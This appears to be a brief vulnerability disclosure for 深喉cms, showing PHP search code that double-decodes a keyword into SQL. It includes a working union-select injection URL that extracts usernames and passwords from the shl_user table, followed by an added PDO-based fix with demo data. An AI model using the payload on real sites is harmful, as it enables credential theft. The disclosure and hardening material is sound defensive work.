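Vulnerability details, brief description:
深喉cms contains a SQL injection vulnerability caused by insufficiently strict handling of input data.
Detailed description: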
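global $db, $request;
// Request values have normally been URL-decoded by PHP already; this decodes them a second time.
$keyword = urldecode($request['keyword']);
switch ($modelName) {
    case 'article':
        // $keyword is concatenated straight into both LIKE clauses.
        $sql = "select * from `".TB_PREFIX."article` where pageName like '%$keyword%' or content like '%$keyword%' order by id desc";
        return $db->get_results($sql);
        break;
    // (remaining cases are not shown in the report)
}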
That's an injection right there, isn't it!!!
http://www.wooyun.org/foo/?p=24&m=search&keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23
Proof of vulnerability:
Fix:
This white hat was lazy and left nothing behind.
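
Since the fix field is empty, here is one way the search lookup could be hardened, as an added example that is not part of the original report or of the CMS's own code. It assumes a PDO connection, a `shl_` table prefix (inferred from the `shl_user` table in the report's URL), and that request values are escaped before they reach this code; the function names and sample rows are hypothetical.

```php
<?php
// Added example, not code from 深喉cms. Table/column names follow the report;
// the PDO handle, function names, "shl_" prefix and sample rows are assumptions.

// Why the original breaks: PHP has already URL-decoded the query string once,
// so "%2527" reaches the script as "%27" and contains no quote to escape.
// The extra urldecode() then turns it into a raw ' inside the SQL string.
function legacyKeyword(string $fromRequest): string
{
    // addslashes() stands in for whatever escaping the request layer applies.
    return urldecode(addslashes($fromRequest));
}

// Escape LIKE wildcards with '!' so user input is matched literally.
function likeLiteral(string $s): string
{
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $s);
}

// Hardened lookup: no second decode, keyword bound as a parameter.
// $prefix must come from configuration (TB_PREFIX), never from the request.
function searchArticles(PDO $pdo, string $prefix, string $keyword): array
{
    $like = '%' . likeLiteral($keyword) . '%';
    $stmt = $pdo->prepare(
        "SELECT * FROM `{$prefix}article`
          WHERE pageName LIKE ? ESCAPE '!' OR content LIKE ? ESCAPE '!'
          ORDER BY id DESC"
    );
    $stmt->execute([$like, $like]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE shl_article (id INTEGER PRIMARY KEY, pageName TEXT, content TEXT)');
$pdo->exec("INSERT INTO shl_article (pageName, content) VALUES ('about', 'aaa news'), ('home', '100% off')");

$arrived = 'aaa%27'; // what the script sees after PHP decoded "aaa%2527" once
echo 'legacy keyword: ', legacyKeyword($arrived), PHP_EOL;
foreach (["aaa' union select 1", 'aaa', '%'] as $kw) {
    echo $kw, ' => ', count(searchArticles($pdo, 'shl_', $kw)), " row(s)\n";
}
```

The first line of output shows the quote surviving the legacy escape-then-decode order; the loop shows the bound keyword being treated as data, including a literal `%`.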